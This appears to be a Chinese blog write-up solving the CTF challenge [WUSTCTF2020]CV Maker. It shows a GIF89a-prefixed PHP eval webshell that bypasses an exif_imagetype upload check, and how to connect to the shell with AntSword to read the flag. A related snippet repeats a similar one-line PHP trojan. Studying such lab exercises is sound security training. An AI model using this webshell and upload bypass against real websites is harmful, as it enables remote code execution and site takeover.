[WUSTCTF2020]CV Maker

最新推荐文章于 2022-01-15 16:24:08 发布
最新推荐文章于 2022-01-15 16:24:08 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: CTF 文章标签: php BUUCTF CTF exif_imagetype
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45646006/article/details/120459197
版权

[WUSTCTF2020]CV Maker

打开网页,先登录,发现可以更改头像,想到可能是文件上传漏洞,试一试上传PHP文件,发现页面报错:exif_imagetype not image!,查阅PHP手册:

exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)
exif_imagetype — 判断一个图像的类型,exif_imagetype() 读取一个图像的第一个字节并检查其签名。

说明exif_imagetype只检查文件头,所以我们可以拦截请求,修改文件名为1.php来上传图片文件:

GIF89a
<script language="php">eval($_POST['shell']);</script>

上传成功后,打开源代码,定位图片元素,发现图片上传路径:

uploads/d41d8cd98f00b204e9800998ecf8427e.php

利用蚁剑空白区域右击添加数据,设置如下:

URL地址  http://17cb7d4f-b10d-49c5-acae-7ee7f5e4f34c.node4.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php
连接密码 shell
网站备注
编码设置 UTF8
连接类型 PHP

其他不变。密码可以随便设置,但要跟$_POST["shell"]一致。

连接后查看网站根目录,得到flag。

References

https://blog.csdn.net/rfrder/article/details/112899315

https://www.cnblogs.com/karsa/p/13418087.html

刷题笔记:[WUSTCTF2020]CV Maker

yym68686
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传&中国菜刀 —— 【WUST-CTF2020】CV Maker
Ve99tr’s Blog
03-30 1801
图片马文件上传以及使用中国菜刀连接服务器
CSE576计算机视觉2020课件汇总
12-20
《CSE576计算机视觉2020课件汇总》是华盛顿大学2020年春季开设的一门深入探讨计算机视觉的课程资料集。这门课程涵盖了从基础理论到前沿技术的广泛内容,旨在帮助学生理解并掌握计算机如何解析和理解图像与视频数据。...
[WUSTCTF2020]CV Maker——简单的开始
Mrs_H的博客
01-15 1077
[WUSTCTF2020]CV Maker 一.前言 emm,有关ssrf的题目在这期间做了几道,大部分都是关于redis和fpm的,这些题目中大多数都是直接用现成已经在市面上广为流行的脚本进行攻击的。事实上,并没有过多的参考价值,也就没有写下他们的wp。最近在复习数学,也没有时间打靶场了,拿这道最简单不过的文件上传题目,来开文件上传的坑吧。不知道什么时候能把坑填完。 二.正文 首先,我们拿到这个题目。(这道题的前端不错 首页就是一个注册的界面,也没有什么东西于是就注册一个账号登进去先看看 ps:这里要说
中国计算机视觉人才调研报告2020年.pdf
03-01
中国计算机视觉人才调研报告2020年
2020年计算机视觉研究报告.pdf
02-10
本报告由中国移动研究院发布,深入探讨了2020年计算机视觉领域的研究进展和产业现状,旨在为相关行业提供参考和指导。 1. 计算机视觉概述 - 计算机视觉的概念:它涵盖了图像处理、机器学习和深度学习等多个领域,...
af2020cv-2020-05-09-v5-dev.zip
08-30
在实际应用中,这样的数据集可能被用于计算机视觉研究,尤其是图像识别和分类任务,比如训练深度学习模型来自动识别海底鱼类。此外,它也可能被生态学家、海洋生物学家或保护主义者用来研究鱼类分布、种群动态或环境...
2020年度中国计算机视觉人才调研报告.pdf
02-22
2020年度中国计算机视觉人才调研报告.pdf
2020中国计算机视觉人才调研报告.pdf
06-11
2020中国计算机视觉人才调研报告.pdf
CVPR2020论文.rar
03-11
CVPR2020致力于计算机视觉和模式识别包括颜色检测、跟踪、运动、物体识别、音响和目标检测。 包含了:分段和分组、运动和跟踪、人类的认识、Shape-from-X、音响和结构与运动、颜色和纹理、照明和反射建模、基于图像...
survey-computer-vision:2020-2021年计算机视觉概述论文分方向整理
03-06
勘测计算机视觉计算机视觉概述论文分方向整理(持续更新)目录本文共梳理了46篇相关文献,由中科院自动化所学者发布。基于深度学习(DL)的目标检测已经取得了很大的进展,这些方法通常假设有大量的带标签的训练数据...
计算机视觉CV视频
03-30
计算机视觉(CV)是人工智能领域的一个重要分支,它主要研究如何让计算机系统“看”并理解图像和视频。本资源包“计算机视觉CV视频”包含了关于这个领域的学习资料,特别是与深度学习框架相关的知识,是深入理解...
BUUCTF--[WUSTCTF2020]CV Maker
qq_46263951的博客
07-06 1279
一开始我们看到是一个注册页面,应该没有什么可用的漏洞,注册进去看看 进入之后看到需要我们更改头像,应该是一个文件上传漏洞,当上传一个php文件时出现一个这样的错误 通过查询我们可以了解到该函数是用来检测文件头的,也就是需要我们构造一个文件头为图像类型的php一句话木马 注意:文件头和一句话木马不可放在同一行 GIF89 <?php eval($_POST['123']); ?> 上传成功后我们通过查看网页源码发现图片路径 通过蚁剑连接即可 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值